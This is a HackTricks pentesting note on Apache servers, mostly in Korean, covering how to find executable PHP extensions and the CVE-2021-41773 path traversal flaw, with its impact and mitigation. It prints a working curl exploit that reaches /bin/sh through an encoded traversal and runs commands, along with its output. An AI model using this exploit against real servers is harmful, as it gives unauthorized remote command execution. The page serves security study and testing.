hacktricks/network-services-pentesting/pentesting-web/apache.md
2024-02-10 21:30:13 +00:00

4 KiB

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

실행 가능한 PHP 확장자

Apache 서버에서 실행 중인 확장자를 확인하세요. 검색하려면 다음을 실행할 수 있습니다:

grep -R -B1 "httpd-php" /etc/apache2

또한, 이 구성을 찾을 수 있는 몇 가지 장소는 다음과 같습니다:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

Description

Apache HTTP Server 2.4.49 and prior versions are vulnerable to a path traversal attack, which allows an attacker to access files outside of the web root directory. This vulnerability can be exploited by sending a specially crafted HTTP request to the server.

Impact

By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive files on the server. This can lead to the exposure of sensitive information, such as configuration files, credentials, or other sensitive data.

Exploitation

To exploit this vulnerability, an attacker can send a GET request with a specially crafted path to the server. By manipulating the path parameter, the attacker can traverse directories and access files outside of the web root directory.

Mitigation

To mitigate this vulnerability, it is recommended to upgrade to Apache HTTP Server version 2.4.50 or later. Additionally, it is advised to implement proper input validation and sanitization to prevent path traversal attacks. Regular security updates and monitoring should also be performed to detect and mitigate any potential attacks.

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법: